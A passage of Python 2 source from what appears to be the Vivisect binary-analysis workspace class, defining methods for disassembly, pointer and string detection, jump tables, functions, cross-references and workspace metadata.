""" loc = self.getLocation(va) if loc is not None: return self.reprLocation(loc) return "None" def reprLocation(self, loctup): if loctup is None: return 'no loc info' lva,lsize,ltype,tinfo = loctup if ltype == LOC_OP: op = self.parseOpcode(lva, arch=tinfo & envi.ARCH_MASK) return repr(op) elif ltype == LOC_STRING: return repr(self.readMemory(lva, lsize)) elif ltype == LOC_UNI: #FIXME super ghetto "simple" unicode handling for now bytes = self.readMemory(lva, lsize) return "u'%s'" % string.join(bytes.split("\x00"),sep="") elif ltype == LOC_STRUCT: lstruct = self.getStructure(lva, tinfo) return repr(lstruct) elif ltype == LOC_NUMBER: value = self.parseNumber(lva, lsize) hexstr = "0x%%.%dx" % lsize hexstr = hexstr % value if lsize == 1: return "BYTE: %d (%s)" % (value, hexstr) else: return "%d BYTES: %d (%s)" % (lsize, value, hexstr) elif ltype == LOC_IMPORT: return "IMPORT: %s" % tinfo elif ltype == LOC_POINTER: return "PTR: %s" % self.arch.pointerString(self.getXrefsFrom(lva)[0][XR_TO]) else: n = self.getName(lva) if n is not None: return n return binascii.hexlify(self.readMemory(lva, lsize)) def followPointer(self, va): """ Do pointer analysis and folllow up the recomendation by creating locations etc... """ ltype = self.analyzePointer(va) if ltype is None: return False # Note, we only implement the types possibly # returned from analyzePointer... if ltype == LOC_OP: # NOTE: currently analyzePointer returns LOC_OP # based on function entries, lets make a func too... logger.debug('discovered new function (followPointer(0x%x))', va) self.makeFunction(va) return True elif ltype == LOC_STRING: self.makeString(va) return True elif ltype == LOC_UNI: self.makeUnicode(va) return True return False def processEntryPoints(self): ''' Roll through EntryPoints and make them into functions (if not already) ''' for eva in self.getEntryPoints(): if self.isFunction(eva): continue if not self.probeMemory(eva, 1, e_mem.MM_EXEC): continue self.makeFunction(eva) def analyze(self): """ Call this to ask any available analysis modules to do their thing... """ self.vprint('Beginning analysis...') starttime = time.time() # Now lets engage any analysis modules. If any modules return # true, they managed to change things and we should run again... for mname in self.amodlist: mod = self.amods.get(mname) self.vprint("Extended Analysis: %s" % mod.__name__) try: mod.analyze(self) except Exception as e: self.vprint("Extended Analysis Exception %s: %s" % (mod.__name__, e)) endtime = time.time() self.vprint('...analysis complete! 
(%d sec)' % (endtime-starttime)) self.printDiscoveredStats() self._fireEvent(VWE_AUTOANALFIN, (endtime, starttime)) def analyzeFunction(self, fva): for fmname in self.fmodlist: fmod = self.fmods.get(fmname) try: fmod.analyzeFunction(self, fva) except Exception as e: self.vprint("Function Analysis Exception for 0x%x %s: %s" % (fva, fmod.__name__, e)) self.setFunctionMeta(fva, "%s fail" % fmod.__name__, traceback.format_exc()) def getStats(self): stats = { 'functions': len(self.funcmeta), 'relocations': len(self.relocations), } return stats def printDiscoveredStats(self): (disc, undisc, numXrefs, numLocs, numFuncs, numBlocks, numOps, numUnis, numStrings, numNumbers, numPointers, numVtables) = self.getDiscoveredInfo() self.vprint("Percentage of discovered executable surface area: %.1f%% (%s / %s)" % (disc*100.0/(disc+undisc), disc, disc+undisc)) self.vprint(" Xrefs/Blocks/Funcs: (%s / %s / %s)" % (numXrefs, numBlocks, numFuncs)) self.vprint(" Locs, Ops/Strings/Unicode/Nums/Ptrs/Vtables: (%s: %s / %s / %s / %s / %s / %s)" % (numLocs, numOps, numStrings, numUnis, numNumbers, numPointers, numVtables)) def getDiscoveredInfo(self): """ Returns tuple of ( bytes_with_locations, bytes_without_locations ) for all executable maps. """ disc = 0 undisc = 0 for mva, msz, mperms, mname in self.getMemoryMaps(): if not self.isExecutable(mva): continue off = 0 while off < msz: loc = self.getLocation(mva+off) if loc is None: off += 1 undisc += 1 else: off += loc[L_SIZE] disc += loc[L_SIZE] numXrefs = len(self.getXrefs()) numLocs = len(self.getLocations()) numFuncs = len(self.getFunctions()) numBlocks = len(self.getCodeBlocks()) numOps = len(self.getLocations(LOC_OP)) numUnis = len(self.getLocations(LOC_UNI)) numStrings = len(self.getLocations(LOC_STRING)) numNumbers = len(self.getLocations(LOC_NUMBER)) numPointers = len(self.getLocations(LOC_POINTER)) numVtables = len(self.getLocations(LOC_VFTABLE)) return disc, undisc, numXrefs, numLocs, numFuncs, numBlocks, numOps, numUnis, numStrings, numNumbers, numPointers, numVtables def getImports(self): """ Return a list of imports in location tuple format. """ return self.getLocations(LOC_IMPORT) def makeImport(self, va, libname, impname): """ Add an import entry. """ if libname != '*': libname = self.normFileName(libname) tinfo = "%s.%s" % (libname, impname) self.makeName(va, "%s_%.8x" % (tinfo, va)) return self.addLocation(va, self.psize, LOC_IMPORT, tinfo=tinfo) def getExports(self): """ Return a list of exports in (va,etype,name,filename) tuples. """ return list(self.exports) def addExport(self, va, etype, name, filename, makeuniq=False): """ Add an already created export object. makeuniq allows Vivisect to append some number to make the name unique. This behavior allows for colliding names (eg. different versions of a function) to coexist in the same workspace. """ rname = "%s.%s" % (filename,name) # check if it exists and is *not* what we're trying to make it curval = self.vaByName(rname) if curval is not None and curval != va and not makeuniq: # if we don't force it to make a uniq name, bail raise Exception("Duplicate Name: %s => 0x%x (cur: 0x%x)" % (rname, va, curval)) rname = self.makeName(va, rname, makeuniq=makeuniq) self._fireEvent(VWE_ADDEXPORT, (va,etype,name,filename)) def getExport(self, va): """ Get a reference to the export object at the given va (or none). """ return self.exports_by_va.get(va) def findPointers(self, cache=True): """ Search through all currently "undefined" space and see if you can find pointers there... 
Returns a list of tuples where the tuple is (<ptr at>,<pts to>). """ align = self.arch.archGetPointerAlignment() if cache: ret = self.getTransMeta('findPointers') if ret is not None: # Filter locations added since last run... ret = [(va, x) for (va, x) in ret if self.getLocation(va) is None and not (va % align)] self.setTransMeta('findPointers', ret) return ret ret = [] size = self.psize for mva, msize, mperm, mname in self.getMemoryMaps(): offset, bytes = self.getByteDef(mva) maxsize = len(bytes) - size # if our memory map is not starting off aligned appropriately if offset % align: offset &= -align offset += align while offset + size < maxsize: va = mva + offset loctup = self.getLocation(va) if loctup is not None: offset += loctup[L_SIZE] if offset % align: offset += align offset &= -align continue x = e_bits.parsebytes(bytes, offset, size, bigend=self.bigend) if self.isValidPointer(x): ret.append((va, x)) offset += size continue offset += align offset &= -align if cache: self.setTransMeta('findPointers', ret) return ret def detectString(self, va): ''' If the address appears to be the start of a string, then return the string length in bytes, else return -1. ''' plen = 0 # pascal string length dlen = 0 # delphi string length if self.isReadable(va-4): plen = self.readMemValue(va - 2, 2) # pascal string length dlen = self.readMemValue(va - 4, 4) # delphi string length offset, bytez = self.getByteDef(va) maxlen = len(bytez) - offset count = 0 while count < maxlen: # If we hit another thing, then probably not. # Ignore when count==0 so detection can check something # already set as a location. if count > 0: loc = self.getLocation(va+count) if loc is not None: if loc[L_LTYPE] == LOC_STRING: if loc[L_VA] == va: return loc[L_SIZE] if ord(bytez[offset+count]) != 0: # we probably hit a case where the string at the lower va is # technically the start of the full string, but the binary does # some optimizations and just ref's inside the full string to save # some space return count + loc[L_SIZE] return loc[L_VA] - (va + count) + loc[L_SIZE] return -1 c = bytez[offset+count] # The "strings" algo basically says 4 or more... if ord(c) == 0 and count >= 4: return count elif ord(c) == 0 and (count == dlen or count == plen): return count if c not in string.printable: return -1 count += 1 return -1 def isProbablyString(self, va): if self.detectString(va) > 0 : return True return False def detectUnicode(self, va): ''' If the address appears to be the start of a unicode string, then return the string length in bytes, else return -1. This will return true if the memory location is likely *simple* UTF16-LE unicode (<ascii><0><ascii><0><0><0>). ''' # FIXME this does not detect Unicode... offset, bytes = self.getByteDef(va) maxlen = len(bytes) - offset count = 0 if maxlen < 2: return -1 charset = bytes[offset + 1] while count < maxlen: # If we hit another thing, then probably not. # Ignore when count==0 so detection can check something # already set as a location. if (count > 0): loc = self.getLocation(va+count) if loc: if loc[L_LTYPE] == LOC_UNI: if loc[L_VA] == va: return loc[L_SIZE] if ord(bytes[offset+count]) != 0: # same thing as in the string case, a binary can ref into a string # only part of the full string. 
return count + loc[L_SIZE] return loc[L_VA] - (va + count) + loc[L_SIZE] return -1 c0 = bytes[offset+count] if offset+count+1 >= len(bytes): return -1 c1 = bytes[offset+count+1] # If we find our null terminator after more # than 4 chars, we're probably a real string if ord(c0) == 0: if count > 8: return count return -1 # If the first byte char isn't printable, then # we're probably not a real "simple" ascii string if c0 not in string.printable: return -1 # If it's not null,char,null,char then it's # not simple unicode... if c1 != charset: return -1 count += 2 return -1 def isProbablyUnicode(self, va): if self.detectUnicode(va) > 0 : return True return False def isProbablyCode(self, va): """ Most of the time, absolute pointes which point to code point to the function entry, so test it for the sig. """ if not self.isExecutable(va): return False ret = self.isFunctionSignature(va) if ret: return ret if self.iscode.get(va): return False self.iscode[va] = True emu = self.getEmulator() emu.setMeta('silent', True) wat = v_emucode.watcher(self, va) emu.setEmulationMonitor(wat) try: emu.runFunction(va, maxhit=1) except Exception as e: return False if wat.looksgood(): return True return False ################################################################# # # Opcode API # def parseOpcode(self, va, arch=envi.ARCH_DEFAULT): ''' Parse an opcode from the specified virtual address. Example: op = m.parseOpcode(0x7c773803) note: differs from the IMemory interface by checking loclist ''' off, b = self.getByteDef(va) if arch == envi.ARCH_DEFAULT: loctup = self.getLocation(va) # XXX - in the case where we've set a location on what should be an # opcode lets make sure L_LTYPE == LOC_OP if not lets reset L_TINFO = original arch param # so that at least parse opcode wont fail if loctup is not None and loctup[L_TINFO] and loctup[L_LTYPE] == LOC_OP: arch = loctup[L_TINFO] return self.imem_archs[(arch & envi.ARCH_MASK) >> 16].archParseOpcode(b, off, va) def iterJumpTable(self, startva, step=None, maxiters=None, rebase=False): if not step: step = self.psize fname = self.getMemoryMap(startva) if fname is None: return fname = fname[3] imgbase = self.getFileMeta(fname, 'imagebase') iters = 0 ptrbase = startva rdest = self.readMemValue(ptrbase, step) if rebase and rdest < imgbase: rdest += imgbase while self.isValidPointer(rdest) and self.isExecutable(rdest) and self.analyzePointer(rdest) in (None, LOC_OP): if self.analyzePointer(ptrbase) in STOP_LOCS: break yield rdest ptrbase += step if len(self.getXrefsTo(ptrbase)): break rdest = self.readMemValue(ptrbase, step) if rebase and rdest < imgbase: rdest += imgbase iters += 1 if maxiters is not None and iters >= maxiters: break def moveCodeBlock(self, cbva, newfva): cb = self.getCodeBlock(cbva) if cb is None: return if cb[CB_FUNCVA] == newfva: return self.delCodeBlock(cb) self.addCodeBlock((cb[CB_VA], cb[CB_SIZE], newfva)) def splitJumpTable(self, callingVa, prevRefVa, newTablAddr, rebase=False, psize=4): ''' So we have the case where if we have two jump tables laid out consecutively in memory (let's call them tables Foo and Bar, with Foo coming before Bar), and we see Foo first, we're going to recognize Foo as being a giant table, with all of Bar overlapping with Foo So we need to construct a list of now invalid references from prevRefVa, starting at newTablAddr newTablAddr should point to the new jump table, and those new codeblock VAs should be removed from the list of references that prevRefVa refs to (and delete the name) We also need to check to see if the functions 
themselves line up (ie, do these two jump tables even belong to the same function, or should we remove the code block from the function entirely?) ''' # Due to how codeflow happens, we have no guarantee that these two adjacent jump tables are # even in the same function codeblocks = set() curfva = self.getFunction(callingVa) # collect all the entries for the new jump table for cb in self.iterJumpTable(newTablAddr, rebase=rebase, step=psize): codeblocks.add(cb) prevcb = self.getCodeBlock(cb) if prevcb is None: continue # we may also have to break these codeblocks from the old function # 1 -- new func is none, old func is none # * can't happen. if the codeblock is defined, we at least have an old function # 2 -- new func is not none, old func is none # * can't happen. see above # 3 -- new func is none, old func is not none # * delete the codeblock. we've dropped into a new function that is different from the old. # given how codeflow discovers functions, we should have all the code blocks for the function # 4 -- neither are none # * moveCodeBlock -- that func will handle whether or not the functions are the same if curfva is not None: self.moveCodeBlock(cb, curfva) else: self.delCodeBlock(prevcb[CB_VA]) # now delete those entries from the previous jump table oldrefs = self.getXrefsFrom(prevRefVa) todel = [xref for xref in oldrefs if xref[1] in codeblocks] for xref in todel: self.setComment(xref[1], None) self.delXref(xref) def makeJumpTable(self, op, tova, rebase=False, psize=4): fname = self.getMemoryMap(tova)[3] imgbase = self.getFileMeta(fname, 'imagebase') ptrbase = tova rdest = self.readMemValue(ptrbase, psize) if rebase and rdest < imgbase: rdest += imgbase # if there's already an Xref to this address from another jump table, we overshot # the other table, and need to cut that one short, delete its Xrefs starting at this one, # and then let the rest of this function build the new jump table. # This jump table also may not be in the same function as the other jump table, so we need # to remove those codeblocks (and child codeblocks) from this function. # at this point, rdest should be the first codeblock in the jumptable, so get all the xrefs to it # (but skipping over the current jumptable base address we're looking at) for xrfrom, xrto, rtype, rflags in self.getXrefsTo(rdest): if tova == xrfrom: continue refloc = self.getLocation(xrfrom) if refloc is None: continue refva, refsize, reftype, refinfo = refloc if reftype != LOC_OP: continue # If we've already constructed this opcode location and made the xref to the new codeblock, # that should mean we've already made the jump table, so there should be no need to split this # jump table. if refva == op.va: continue refop = self.parseOpcode(refva) for refbase, refbflags in refop.getBranches(): if refbflags & envi.BR_TABLE: self.splitJumpTable(op.va, refva, tova, psize=psize) tabdone = {} for i, rdest in enumerate(self.iterJumpTable(ptrbase, rebase=rebase, step=psize)): if not tabdone.get(rdest): tabdone[rdest] = True self.addXref(op.va, rdest, REF_CODE, envi.BR_COND) if self.getName(rdest) is None: self.makeName(rdest, "case%d_%.8x" % (i, op.va)) else: cmnt = self.getComment(rdest) if cmnt is None: self.setComment(rdest, "Other Case(s): %d" % i) else: cmnt += ", %d" % i self.setComment(rdest, cmnt) # This must be second (len(xrefsto)) self.addXref(op.va, tova, REF_PTR) def makeOpcode(self, va, op=None, arch=envi.ARCH_DEFAULT): """ Create a single opcode location. If you have already parsed the opcode object, you may pass it in.
""" if op is None: try: op = self.parseOpcode(va, arch=arch) except envi.InvalidInstruction as msg: # FIXME something is just not right about this... bytez = self.readMemory(va, 16) logger.warning("Invalid Instruct Attempt At:", hex(va), binascii.hexlify(bytez)) raise InvalidLocation(va, msg) except Exception as msg: raise InvalidLocation(va, msg) # Add our opcode location first (op flags become ldata) loc = self.addLocation(va, op.size, LOC_OP, op.iflags) # This takes care of all normal indirect immediates brdone = {} brlist = op.getBranches() for tova, bflags in brlist: # If there were unresolved dynamic branches, oh well... if tova is None: continue if not self.isValidPointer(tova): continue brdone[tova] = True # Special case, if it's a table branch, lets resolve it now. if bflags & envi.BR_TABLE: self.makeJumpTable(op, tova) elif bflags & envi.BR_DEREF: self.addXref(va, tova, REF_DATA) ptrdest = None if self.getLocation(tova) is None: ptrdest = self.makePointer(tova, follow=False) # If the actual dest is executable, make a code ref fixup # which *removes* the deref flag... if ptrdest and self.probeMemory(ptrdest[0], 1, e_mem.MM_EXEC): self.addXref(va, ptrdest[0], REF_CODE, bflags & ~envi.BR_DEREF) else: self.addXref(va, tova, REF_CODE, bflags) else: # vivisect does NOT create REF_CODE entries for # instruction fall through if bflags & envi.BR_FALL: continue self.addXref(va, tova, REF_CODE, bflags) # Check the instruction for static d-refs for oidx, o in op.genRefOpers(emu=None): # FIXME it would be nice if we could just do this one time # in the emulation pass (or hint emulation that some have already # been done. # unfortunately, emulation pass only occurs for code identified # within a marked function. # future fix: move this all into VivCodeFlowContext. # Does the operand touch memory ? if o.isDeref(): ref = o.getOperAddr(op, None) if brdone.get(ref, False): continue if ref is not None and self.isValidPointer(ref): # It's a data reference. lets also check if the data is # a pointer. self.addXref(va, ref, REF_DATA) # If we don't already know what type this location is, # lets make it either a pointer or a number... if self.getLocation(ref) is None: offset, _ = self.getByteDef(ref) val = self.parseNumber(ref, o.tsize) # So we need the size check to avoid things like "aaaaa", maybe # but maybe if we do something like the tsize must be either the # target pointer size or in a set of them that the arch defines? if (self.psize == o.tsize and self.isValidPointer(val)): self.makePointer(ref, tova=val) else: self.makeNumber(ref, o.tsize) else: ref = o.getOperValue(op) if brdone.get(ref, False): continue if ref is not None and type(ref) in (int, long) and self.isValidPointer(ref): self.addXref(va, ref, REF_PTR) return loc def _dbgLocEntry(self, va): """ Display the human-happy version of a location """ loc = self.getLocation(va) if loc is None: return 'None' lva, lsz, ltype, ltinfo = loc ltvar = loc_lookups.get(ltype) ltdesc = loc_type_names.get(ltype) locrepr = '(0x%x, %d, %s, %r) # %s' % (lva, lsz, ltvar, ltinfo, ltdesc) return locrepr def updateCallsFrom(self, fva, ncalls): function = self.getFunction(fva) prev_call = self.getFunctionMeta(function, 'CallsFrom') ncall = set(prev_call).union(calls_from) self.setFunctionMeta(function, 'CallsFrom', list(ncall)) def makeCode(self, va, arch=envi.ARCH_DEFAULT, fva=None): """ Attempt to begin code-flow based disassembly by starting at the given va. 
The va will be made into an OpcodeLoc and refs will be walked continuing to make code where possible. """ # If this is already a location, bail. if self.isLocation(va): return calls_from = self.cfctx.addCodeFlow(va, arch=arch) if fva is None: self.setVaSetRow('CodeFragments', (va, calls_from)) else: self.updateCallsFrom(va, calls_from) return calls_from def previewCode(self, va, arch=envi.ARCH_DEFAULT): ''' Show the repr of an instruction in the current canvas *before* making it that ''' try: op = self.parseOpcode(va, arch) if op is None: self.vprint("0x%x - None") else: self.vprint("0x%x (%d bytes) %s" % (va, len(op), repr(op))) except Exception: self.vprint("0x%x - decode exception" % va) logger.exception("preview opcode exception:") ################################################################# # # Function API # def isFunction(self, funcva): """ Return True if funcva is a function entry point. """ return self.funcmeta.get(funcva) is not None def isFunctionThunk(self, funcva): """ Return True if funcva is a function thunk """ # TODO: could we do more here? try: return self.getFunctionMeta(funcva, 'Thunk') is not None except InvalidFunction: return False def getFunctions(self): """ Return a list of the function virtual addresses defined in the workspace. """ return self.funcmeta.keys() def getFunction(self, va): """ Return the VA for this function. This will search code blocks and check for a function va. """ if self.funcmeta.get(va) is not None: return va cbtup = self.getCodeBlock(va) if cbtup is not None: return cbtup[CB_FUNCVA] return None def makeFunction(self, va, meta=None, arch=envi.ARCH_DEFAULT): """ Do parsing for function information and add a new function doodad. This function should probably only be called once code-flow for the area is complete. """ if self.isFunction(va): return if not self.isValidPointer(va): raise InvalidLocation(va) loc = self.getLocation(va) if loc is not None and loc[L_TINFO] is not None and loc[L_LTYPE] == LOC_OP: arch = loc[L_TINFO] realfva = self.cfctx.addEntryPoint(va, arch=arch) if meta is not None: for key, val in meta.items(): self.setFunctionMeta(realfva, key, val) return realfva def delFunction(self, funcva): """ Remove a function, it's code blocks and all associated meta """ if self.funcmeta.get(funcva) is None: raise InvalidLocation(funcva) self._fireEvent(VWE_DELFUNCTION, funcva) def setFunctionArg(self, fva, idx, atype, aname): ''' Set the name and type information for a single function arguemnt by index. Example: # If we were setting up main... vw.setFunctionArg(fva, 0, 'int','argc') vw.setFunctionArg(fva, 1, 'char **','argv') ''' rettype,retname,callconv,callname,callargs = self.getFunctionApi(fva) while len(callargs) <= idx: callargs.append( ('int','arg%d' % len(callargs)) ) callargs[idx] = (atype,aname) self.setFunctionApi(fva, (rettype,retname,callconv,callname,callargs)) def getFunctionArgs(self, fva): ''' Returns the list of (typename,argname) tuples which define the arguments for the specified function. Example: for typename,argname in vw.getFunctionArgs(fva): print('Takes: %s %s' % (typename,argname)) ''' rettype,retname,callconv,callname,callargs = self.getFunctionApi(fva) return list(callargs) def getFunctionApi(self, fva): ''' Retrieve the API definition for the given function address. Returns: an API tuple (similar to impapi subsystem) or None ( rettype, retname, callconv, funcname, ( (argtype, argname), ...) 
) ''' ret = self.getFunctionMeta(fva, 'api') if ret is not None: return ret defcall = self.getMeta('DefaultCall','unkcall') return ('void',None,defcall,None,()) def setFunctionApi(self, fva, apidef): ''' Set a function's API definition. NOTE: apidef is a tuple similar to the impapi subsystem ( rettype, retname, callconv, funcname, ( (argtype, argname), ...) ) Example: apidef = ('int','size','stdcall','getThingSize', ( ('void *','thing'), )) vw.setFunctionApi(fva, apidef) ''' self.setFunctionMeta(fva, 'api', apidef) def getFunctionLocals(self, fva): ''' Retrieve the list of (fva,spdelta,symtype,syminfo) tuples which represent the given function's local memory offsets. ''' if not self.isFunction(fva): raise InvalidFunction(fva) return self.localsyms[fva].values() def getFunctionLocal(self, fva, spdelta): ''' Retrieve a function local symbol definition as a (typename,symname) tuple or None if not found. NOTE: If the local symbol references a LSYM_FARG, this API will resolve the argument name/type from the function API definition. Example: locsym = vw.getFunctionLocal(fva, 8) if locsym: symtype,symname = locsym print('%s %s;' % (symtype,symname)) ''' locsym = self.localsyms[fva].get(spdelta) if locsym is None: return None fva,spdelta,symtype,syminfo = locsym if symtype == LSYM_NAME: return syminfo if symtype == LSYM_FARG: apidef = self.getFunctionApi(fva) if apidef is None: return None funcargs = apidef[-1] if syminfo >= len(funcargs): return None return funcargs[syminfo] raise Exception('Unknown Local Symbol Type: %d' % symtype) def setFunctionLocal(self, fva, spdelta, symtype, syminfo): ''' Assign a local symbol within a function (addressed by delta from initial sp). For each symbol, a "symtype" and "syminfo" field are used to specify the details. Example: # Setup a regular local integer vw.setFunctionLocal(fva, -4, LSYM_NAME, ('int','x')) # Setup a link to a stack argument... (ie. i386 cdecl) vw.setFunctionLocal(fva, 4, LSYM_FARG, 0) # Setup amd64 style shadow space vw.setFunctionLocal(fva, 8, LSYM_NAME, ('void *','shadow0')) ''' metaname = 'LocalSymbol:%d' % spdelta metavalue = (fva,spdelta,symtype,syminfo) self.setFunctionMeta(fva, metaname, metavalue) def setFunctionMeta(self, funcva, key, value): """ Set meta key,value pairs that describe a particular function (by funcva). Example: vw.setFunctionMeta(fva, "WootKey", 10) """ if not self.isFunction(funcva): raise InvalidFunction(funcva) self._fireEvent(VWE_SETFUNCMETA, (funcva, key, value)) def getFunctionMeta(self, funcva, key, default=None): m = self.funcmeta.get(funcva) if m is None: raise InvalidFunction(funcva) return m.get(key, default) def getFunctionMetaDict(self, funcva): """ Return the entire dictionary of function metadata for the function specified at funcva """ return self.funcmeta.get(funcva) def getFunctionBlocks(self, funcva): """ Return the code-block objects for the given function va """ ret = self.codeblocks_by_funcva.get(funcva) if ret is None: ret = [] return ret def makeFunctionThunk(self, fva, thname, addVa=True, filelocal=False): """ Inform the workspace that a given function is considered a "thunk" to another. This allows the workspace to process argument inheritance and several other things. 
Usage: vw.makeFunctionThunk(0xvavavava, "kernel32.CreateProcessA") """ self.checkNoRetApi(thname, fva) self.setFunctionMeta(fva, "Thunk", thname) n = self.getName(fva) base = thname.split(".")[-1] if addVa: name = "%s_%.8x" % (base,fva) else: name = base newname = self.makeName(fva, name, filelocal=filelocal, makeuniq=True) api = self.getImpApi(thname) if api: # Set any argument names that are None rettype,retname,callconv,callname,callargs = api callargs = [ callargs[i] if callargs[i][1] else (callargs[i][0],'arg%d' % i) for i in range(len(callargs)) ] self.setFunctionApi(fva, (rettype,retname,callconv,callname,callargs)) def getCallers(self, va): ''' Get the va for all the callers of the given function/import. Example: for va in vw.getCallers( importva ): dostuff(va) ''' ret = [] for fromva, tova, rtype, rflags in self.getXrefsTo(va, rtype=REF_CODE): if rflags & envi.BR_PROC: ret.append(fromva) return ret def getCallGraph(self): ''' Retrieve a visgraph Graph object representing all known inter procedural branches in the workspace. Each node has an ID that is the same as the function va. Example: graph = vw.getCallGraph() ''' return self._call_graph def getFunctionGraph(self, fva): ''' Retrieve a code-block graph for the specified virtual address. Procedural branches (ie, calls) will not be followed during graph construction. ''' return viv_codegraph.FuncBlockGraph(self,fva) def getImportCallers(self, name): """ Get a list of all the callers who reference the specified import by name. (If we detect that the name is actually *in* our workspace, return those callers too... """ ret = [] # If it's a local function, do that too.. fva = self.vaByName(name) if fva is not None and self.isFunction(fva): ret = self.getCallers(fva) for fva in self.getFunctions(): if self.getFunctionMeta(fva, 'Thunk') == name: ret.extend( self.getCallers( fva ) ) for lva,lsize,ltype,tinfo in self.getLocations(LOC_IMPORT): if tinfo == name: ret.extend( self.getCallers( lva ) ) return ret ################################################################# # # Xref API # def getXrefs(self, rtype=None): """ Return the entire list of XREF tuples for this workspace. """ if rtype: return [ xtup for xtup in self.xrefs if xtup[XR_RTYPE] == rtype ] return self.xrefs def getXrefsFrom(self, va, rtype=None): """ Return a list of tuples for the xrefs whose origin is the specified va. Optionally, only return xrefs whose type field is rtype if specified. example: for fromva, tova, rtype, rflags in vw.getXrefsFrom(0x41414141): dostuff(tova) """ ret = [] xrefs = self.xrefs_by_from.get(va, None) if xrefs is None: return ret if rtype is None: return xrefs return [ xtup for xtup in xrefs if xtup[XR_RTYPE] == rtype ] def getXrefsTo(self, va, rtype=None): """ Get a list of xrefs which point to the given va. Optionally, specify an rtype to get only xrefs of that type. """ # FIXME make xrefs use MapLookup! ret = [] xrefs = self.xrefs_by_to.get(va, None) if xrefs is None: return ret if rtype is None: return xrefs return [ xtup for xtup in xrefs if xtup[XR_RTYPE] == rtype ] def addMemoryMap(self, va, perms, fname, bytes): """ Add a memory map to the workspace. This is the *only* way to get memory backings into the workspace. """ self._fireEvent(VWE_ADDMMAP, (va, perms, fname, bytes)) def delMemoryMap(self, va): raise "OMG" def addSegment(self, va, size, name, filename): """ Add a "segment" to the workspace. A segment is generally some meaningful area inside of a memory map. For PE binaries, a segment and a memory map are synonymous. 
However, some platforms (Elf) specify their memory maps (program headers) and segments (sectons) seperately. """ self._fireEvent(VWE_ADDSEGMENT, (va,size,name,filename)) def getSegment(self, va): """ Return the tuple representation of a segment. With the following format: (va, size, name, filename) """ for seg in self.segments: sva, ssize, sname, sfile = seg if va >= sva and va < (sva + ssize): return seg return None def getSegments(self): """ Return a list of segment tuples (see getSegment) for all the segments defined in the current worksace """ return list(self.segments) def addCodeBlock(self, va, size, funcva): """ Add a region of code which belongs to a function. Code-block boundaries are at all logical branches and have more in common with a logical graph view than function chunks. """ loc = self.getLocation( va ) if loc is None: raise Exception('Adding Codeblock on *non* location?!?: 0x%.8x' % va) self._fireEvent(VWE_ADDCODEBLOCK, (va,size,funcva)) def getCodeBlock(self, va): """ Return the codeblock which contains the given va. A "codeblock" is a location compatable tuple: (va, size, funcva) """ return self.blockmap.getMapLookup(va) def delCodeBlock(self, va): """ Remove a code-block definition from the codeblock namespace. """ cb = self.getCodeBlock(va) if cb is None: raise Exception("Unknown Code Block: 0x%x" % va) self._fireEvent(VWE_DELCODEBLOCK, cb) def getCodeBlocks(self): """ Return a list of all the codeblock objects. """ return list(self.codeblocks) def addXref(self, fromva, tova, reftype, rflags=0): """ Add an xref with the specified fromva, tova, and reftype (see REF_ macros). This will *not* trigger any analysis. Callers are expected to do their own xref analysis (ie, makeCode() etc) """ # Architecture gets to decide on actual final VA (ARM/THUMB/etc...) tova, reftype, rflags = self.arch.archModifyXrefAddr(tova, reftype, rflags) ref = (fromva, tova, reftype, rflags) if ref in self.getXrefsFrom(fromva): return self._fireEvent(VWE_ADDXREF, (fromva, tova, reftype, rflags)) def delXref(self, ref): """ Remove the given xref. This *will* exception if the xref doesn't already exist... """ if ref not in self.getXrefsFrom(ref[XR_FROM]): raise Exception("Unknown Xref: %x %x %d" % ref) self._fireEvent(VWE_DELXREF, ref) def analyzePointer(self, va): """ Assume that a new pointer has been created. Check if it's target has a defined location and if not, try to figgure out wtf is there... Will return the location type of the location it recommends or None if a location is already there or it has no idea. """ if self.getLocation(va) is not None: return None if self.isProbablyString(va): return LOC_STRING elif self.isProbablyUnicode(va): return LOC_UNI elif self.isProbablyCode(va): return LOC_OP return None def getMeta(self, name, default=None): return self.metadata.get(name, default) def setMeta(self, name, value): """ Set a meta key,value pair for this workspace. """ self._fireEvent(VWE_SETMETA, (name,value)) def markDeadData(self, start, end): """ mark a virtual range as dead code. """ self.setMeta("deaddata:0x%08x" % start, (start, end)) def unmarkDeadData(self, start, end): """ unmark a virtual range as dead code """ self._dead_data.remove( (start,end) ) def _mcb_deaddata(self, name, value): """ callback from setMeta with namespace deaddata: that indicates a range has been added as dead data. """ if value not in self._dead_data: self._dead_data.append( value ) def isDeadData(self, va): """ Return boolean indicating va is in a dead data range. 
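
        Example (assuming vw is this workspace):
            if not vw.isDeadData(va):
                dostuff(va)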
""" for start,end in self._dead_data: if va >= start and va <= end: return True return False def initMeta(self, name, value): """ Set a metakey ONLY if it is not already set. Either way return the value of the meta key. """ m = self.getMeta(name) if m is None: self.setMeta(name, value) m = value return m def getTransMeta(self, mname, default=None): ''' Retrieve a piece of "transient" metadata which is *not* stored across runs or pushed through the event subsystem. ''' return self.transmeta.get(mname,default) def setTransMeta(self, mname, value): ''' Store a piece of "transient" metadata which is *not* stored across runs or pushed through the event subsystem. ''' self.transmeta[mname] = value def castPointer(self, va): """ Return the value for a pointer in memory at the given location. This method does NOT create a location object or do anything other than parse memory. """ offset, bytes = self.getByteDef(va) return e_bits.parsebytes(bytes, offset, self.psize, bigend=self.bigend) def makePointer(self, va, tova=None, follow=True): """ Create a new pointer location in the workspace. If you have already parsed out the pointers value, you may specify tova to speed things up. """ loctup = self.getLocation(va) if loctup is not None: logger.warn("0x%x: Attempting to make a Pointer where another location object exists (of type %r)", va, self.reprLocation(loctup)) return None psize = self.psize # Get and document the xrefs created for the new location if tova is None: tova = self.castPointer(va) self.addXref(va, tova, REF_PTR) ploc = self.addLocation(va, psize, LOC_POINTER) if follow and self.isValidPointer(tova): self.followPointer(tova) return ploc def makePad(self, va, size): """ A special utility for making a pad of a particular size. """ return self.addLocation(va, size, LOC_PAD, None) def makeNumber(self, va, size, val=None): """ Create a number location in memory of the given size. (you may specify val if you have already parsed the value from memory and would like to save CPU cycles) """ return self.addLocation(va, size, LOC_NUMBER, None) def parseNumber(self, va, size): ''' Parse a <size> width numeric value from memory at <va>. Example: val = vw.parseNumber(0x41414140, 4) ''' offset, bytes = self.getByteDef(va) return e_bits.parsebytes(bytes, offset, size, bigend=self.bigend) def _getSubstrings(self, va, size, ltyp): # rip through the desired memory range to populate any substrings subs = set() end = va + size for offs in range(va, end, 1): loc = self.getLocation(offs, range=True) if loc and loc[L_LTYPE] == LOC_STRING and loc[L_VA] > va: subs.add((loc[L_VA], loc[L_SIZE])) if loc[L_TINFO]: subs = subs.union(set(loc[L_TINFO])) return list(subs) def 